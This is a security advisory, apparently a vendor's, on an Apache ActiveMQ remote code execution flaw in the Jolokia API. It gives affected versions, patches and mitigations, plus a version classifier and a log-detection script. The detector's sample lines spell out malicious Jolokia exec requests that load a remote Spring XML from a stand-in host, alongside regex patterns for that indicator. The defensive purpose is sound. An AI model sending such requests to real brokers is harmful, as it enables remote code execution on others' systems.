
Emerging Threat: (CVE-2026-34197) Apache ActiveMQ Remote Code Execution via Jolokia API

What is CVE-2026-34197?

CVE-2026-34197 is a remote code execution vulnerability in Apache ActiveMQ Classic. The flaw exists in the Jolokia JMX-HTTP bridge, which ActiveMQ exposes at /api/jolokia/ on the broker's web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI: a vm:// transport whose brokerConfig parameter points at a remote Spring XML application context (xbean:http://...). Because Spring's ResourceXmlApplicationContext instantiates every singleton bean before BrokerService validates the configuration, arbitrary code executes in the broker's JVM through bean definitions that resolve to calls such as Runtime.exec().

The vulnerability carries a CVSS v3.1 base score of 8.8 (High). Exploitation requires low privileges in the general case, but default credentials (admin:admin) remain common across ActiveMQ deployments. On ActiveMQ versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) left the Jolokia endpoint entirely outside the web console's security constraints, making CVE-2026-34197 effectively unauthenticated on those versions.

The underlying code path has been present for approximately 13 years. ActiveMQ has been a repeated target for real-world attackers, and public proof-of-concept exploits are already available.

What assets are affected by CVE-2026-34197?

Apache ActiveMQ Classic versions prior to 5.19.4 and versions 6.0.0 through 6.2.2 are affected. Any system running an unpatched ActiveMQ broker with the web console enabled on its default port, 8161, is potentially vulnerable.
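The version ranges above are simple to state but easy to misjudge once a version string arrives with a suffix or from an inventory feed. The following is an added example, not CyCognito's or the ActiveMQ project's code: it classifies an ActiveMQ Classic version against exactly the ranges this advisory lists, flagging the 6.0.0 to 6.1.1 overlap with CVE-2024-32114 separately, and reads the broker version out of a Jolokia read response. The Jolokia response below is constructed, and the assumption that the broker version is exposed as the BrokerVersion attribute of the org.apache.activemq:type=Broker MBean is mine; anything outside the listed ranges is reported as not in those ranges, not as safe.

```python
"""Classify an ActiveMQ Classic version against the affected ranges named
in this advisory for CVE-2026-34197.

Added example, not CyCognito's or the ActiveMQ project's code. The ranges
are copied from the advisory; versions outside them are reported as
"not-in-listed-ranges" rather than "safe".
"""
import json
import re

FIXED_5 = (5, 19, 4)                    # 5.19.4 fixes the 5.x line
FIXED_6 = (6, 2, 3)                     # 6.2.3 fixes the 6.x line
UNAUTH_RANGE = ((6, 0, 0), (6, 1, 1))   # CVE-2024-32114 overlap: Jolokia reachable without auth


def parse_version(text):
    """Return (major, minor, patch) from strings such as '5.18.3' or
    '6.1.0-SNAPSHOT'; trailing qualifiers are ignored."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(g) for g in m.groups())


def classify(version):
    """Map a version string to one of:
    'affected'                  - in an affected range, authentication required
    'affected-unauthenticated'  - 6.0.0..6.1.1, where CVE-2024-32114 removes auth
    'not-in-listed-ranges'      - outside every range the advisory names
    """
    v = parse_version(version)
    if v < FIXED_5:                      # everything prior to 5.19.4
        return "affected"
    if v[0] == 6 and v < FIXED_6:        # 6.0.0 through 6.2.2
        lo, hi = UNAUTH_RANGE
        if lo <= v <= hi:
            return "affected-unauthenticated"
        return "affected"
    return "not-in-listed-ranges"


def version_from_jolokia_read(body):
    """Extract the broker version from a Jolokia 'read' response body.

    Assumption (not from the advisory): the read targeted
    org.apache.activemq:type=Broker,brokerName=<name> / BrokerVersion.
    """
    doc = json.loads(body)
    if doc.get("status") != 200:
        raise ValueError(f"Jolokia returned status {doc.get('status')}")
    return str(doc["value"])


def assess(body):
    """Convenience: classify the version found in a Jolokia read response."""
    return classify(version_from_jolokia_read(body))


# Constructed sample response, not captured from a real broker.
SAMPLE_RESPONSE = (
    '{"request":{"mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"attribute":"BrokerVersion","type":"read"},'
    '"value":"6.1.0","timestamp":1700000000,"status":200}'
)

if __name__ == "__main__":
    for ver in ("5.18.3", "5.19.4", "6.1.1", "6.2.2", "6.2.3"):
        print(ver, "->", classify(ver))
    print("sample response ->", assess(SAMPLE_RESPONSE))
```

The classification deliberately keeps a separate bucket for 6.0.0 through 6.1.1 so that an inventory sweep surfaces the brokers where the Jolokia endpoint needs no credentials first.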

In practice, affected assets are message brokers that serve as middleware between application components. ActiveMQ is widely deployed in enterprise environments for asynchronous messaging, event-driven architectures, and system integration. These brokers commonly sit behind load balancers or within internal networks, but many are also directly internet-facing due to legacy deployment patterns, cloud migrations, or operational convenience.

The web console, including the Jolokia endpoint, is enabled by default in most ActiveMQ installations. Organizations running older versions often lack visibility into whether port 8161 is reachable from untrusted networks. Environments with mixed on-premises and cloud infrastructure are especially prone to unintentionally exposed management interfaces.

Are fixes available?

Patches are available. Apache has released ActiveMQ Classic 5.19.4 and 6.2.3, both of which remove the ability for the addNetworkConnector operation to add vm:// transports. This code path was never intended to be exposed as a remote operation.

Organizations running ActiveMQ versions 6.0.0 through 6.1.1 should treat remediation as especially urgent, as the combination of CVE-2026-34197 and CVE-2024-32114 enables unauthenticated remote code execution on those versions. Upgrading to 6.2.3 addresses both vulnerabilities.

Defenders should verify patch availability and applicability directly with their vendor or distribution maintainer rather than assuming a fix is available across all environments. Some Linux distributions may still be evaluating the patch for their packaged ActiveMQ versions.

Until the patch is applied, restrict or disable Jolokia exec operations in the Jolokia access policy, block or limit access to /api/jolokia/, and restrict the web console (port 8161) to trusted management networks only. Replace default credentials with strong, unique ones. Monitor ActiveMQ broker logs for network connector activity referencing vm:// URIs with brokerConfig=xbean:http, which is a clear indicator of exploitation attempts.
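The indicator named above, a vm:// URI carrying brokerConfig=xbean:http, can reach the broker in several encodings: percent-encoded in a GET path, with Jolokia's own escaping of slashes, or as JSON \u escapes in a POST body. The detection below is an added example, not CyCognito's or the ActiveMQ project's code. It normalises those encodings before matching, rates a remote-xbean vm:// URI as high and any other Jolokia exec of addNetworkConnector or addConnector as medium, and runs over constructed sample lines; the log line formats, host addresses and path names are illustrative, not captured from a real broker, and the assumption that Jolokia GET requests escape slashes as "!/" is mine.

```python
"""Detection helper for CVE-2026-34197 exploitation attempts.

Added example for this advisory, not CyCognito's or the ActiveMQ project's
code. Scans text lines (web console access logs, Jolokia request bodies,
broker logs) for the advisory's indicator: a vm:// connector URI whose
brokerConfig parameter points at a remote xbean:http(s) resource.
"""
import re
from urllib.parse import unquote

# Jolokia exec targets named in the advisory.
RISKY_OPERATIONS = ("addNetworkConnector", "addConnector")

VM_XBEAN_RE = re.compile(
    r"vm://[^\s\"']*?brokerConfig=xbean:https?://[^\s\"'&]+", re.IGNORECASE)
JOLOKIA_EXEC_RE = re.compile(
    r'(?:/api/jolokia/exec/|"type"\s*:\s*"exec").*?(addNetworkConnector|addConnector)',
    re.IGNORECASE | re.DOTALL)


def normalise(line):
    """Undo encodings the URI may be hidden behind: repeated
    percent-encoding (bounded to three rounds), Jolokia's '!/' and '!!'
    escapes inside GET path segments (assumption), and JSON \\uXXXX escapes
    in POST bodies."""
    decoded = line
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("!/", "/").replace("!!", "!")
    decoded = re.sub(r"\\u([0-9a-fA-F]{4})",
                     lambda m: chr(int(m.group(1), 16)), decoded)
    return decoded


def scan_line(line):
    """Return a finding dict for a suspicious line, else None."""
    text = normalise(line)
    m = VM_XBEAN_RE.search(text)
    if m:
        return {"severity": "high",
                "reason": "vm:// URI with remote brokerConfig=xbean:http",
                "uri": m.group(0)}
    m = JOLOKIA_EXEC_RE.search(text)
    if m:
        return {"severity": "medium",
                "reason": f"Jolokia exec of {m.group(1)}",
                "uri": None}
    return None


def scan_lines(lines):
    """Scan every line; findings carry the 1-based line number."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = scan_line(line)
        if f:
            f["line_no"] = n
            findings.append(f)
    return findings


# Constructed sample lines (not real ActiveMQ or Jetty output).
SAMPLE_LINES = [
    # GET exec, argument percent-encoded with '!/' slash escaping.
    '10.0.0.5 - admin [01/Jan/2026:10:00:01 +0000] "GET /api/jolokia/exec/'
    'org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/'
    'vm%3A!%2F!%2Flocalhost%3FbrokerConfig%3Dxbean%3Ahttp%3A!%2F!%2F203.0.113.10!%2Fpoc.xml'
    ' HTTP/1.1" 200 312',
    # POST body with JSON \u escapes on the colons.
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)",'
    '"arguments":["vm\\u003a//localhost?brokerConfig=xbean\\u003ahttp://203.0.113.10/poc.xml"]}',
    # Broker log line after the connector was added.
    'INFO  | Network connector started: vm://localhost?brokerConfig=xbean:http://203.0.113.10/poc.xml',
    # Exec of addConnector with a plain tcp:// URI: worth a look, not an xbean load.
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addConnector(java.lang.String)","arguments":["tcp://0.0.0.0:61617"]}',
    # Benign read of the broker version.
    '10.0.0.9 - admin [01/Jan/2026:10:00:05 +0000] "GET /api/jolokia/read/'
    'org.apache.activemq:type=Broker,brokerName=localhost/BrokerVersion HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        print(f["line_no"], f["severity"], f["reason"], f["uri"] or "")
```

Matching on the decoded form matters more than the exact patterns: a rule that only looks for the literal string brokerConfig=xbean:http in an access log misses the percent-encoded GET variant entirely.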

How can CyCognito help your organization?

CyCognito published an Emerging Threat Advisory for CVE-2026-34197 in the CyCognito platform and is actively researching enhanced detection capabilities for this vulnerability.

To learn how CyCognito can help your organization reduce external exposure and manage emerging threats more effectively, contact us to request a demo.
